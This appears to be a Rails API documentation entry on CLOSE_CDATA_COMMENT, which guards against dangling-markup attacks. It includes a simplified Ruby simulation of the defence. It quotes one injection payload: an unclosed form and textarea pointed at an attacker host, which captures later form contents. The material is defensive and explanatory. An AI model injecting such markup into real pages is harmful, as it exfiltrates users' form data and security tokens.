constant CLOSE_CDATA_COMMENT
Ruby on Rails 7.1.6
Since v7.1.6
Close any open tags that support CDATA (textarea, xmp) before each form tag. This prevents attackers from injecting unclosed tags that could capture form contents.
For example, an attacker might inject:
<form action="https://attacker.com"><textarea>
The HTML following this tag, up until the next </textarea> or the end of the document, would be captured by the attacker’s <textarea>. By closing any open textarea tags, we ensure that form contents are never exfiltrated.
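The following added example (plain Ruby, not Rails source) models the capture described above and shows how emitting closing markup before a form cuts it off. The `CLOSER` string is an assumed value for the constant, which this page does not show; `captured_text` and `render_page` are hypothetical helpers, and the parser model is deliberately simplified.

```ruby
# Assumed closing markup: an HTML comment that is inert in normal markup but
# whose end tags terminate a <textarea> or <xmp> left open earlier in the page.
CLOSER = "<!-- </textarea></xmp> -->"

# Constructed sample: a form the application renders, carrying a secret token.
FORM = '<form action="/transfer" method="post">' \
       '<input type="hidden" name="authenticity_token" value="s3cr3t-constructed">' \
       '</form>'

# The unclosed markup from the example above.
INJECTED = '<form action="https://attacker.com"><textarea>'

# Simplified model of how an HTML parser treats <textarea>/<xmp>: after the
# start tag, everything is text until the matching end tag or end of document.
# Returns the text captured by the first such element, or nil if none opens.
def captured_text(html)
  opener = html.match(/<(textarea|xmp)\b[^>]*>/i)
  return nil unless opener

  rest = opener.post_match
  closer = rest.match(%r{</#{opener[1]}\s*>}i)
  closer ? closer.pre_match : rest
end

# Builds a page where untrusted markup precedes a legitimate form, with or
# without the closing markup emitted directly before the form tag.
def render_page(prefix_forms:)
  form = prefix_forms ? CLOSER + FORM : FORM
  "<p>Comment: #{INJECTED}</p>\n#{form}\n<footer>end</footer>"
end

unprotected = captured_text(render_page(prefix_forms: false))
guarded     = captured_text(render_page(prefix_forms: true))

puts "without closer, token captured: #{unprotected.include?('s3cr3t-constructed')}"
puts "with closer, token captured:    #{guarded.include?('s3cr3t-constructed')}"
puts "with closer, captured text:     #{guarded.inspect}"
```

When no tag is left open, the closing markup parses as an ordinary comment and captures nothing.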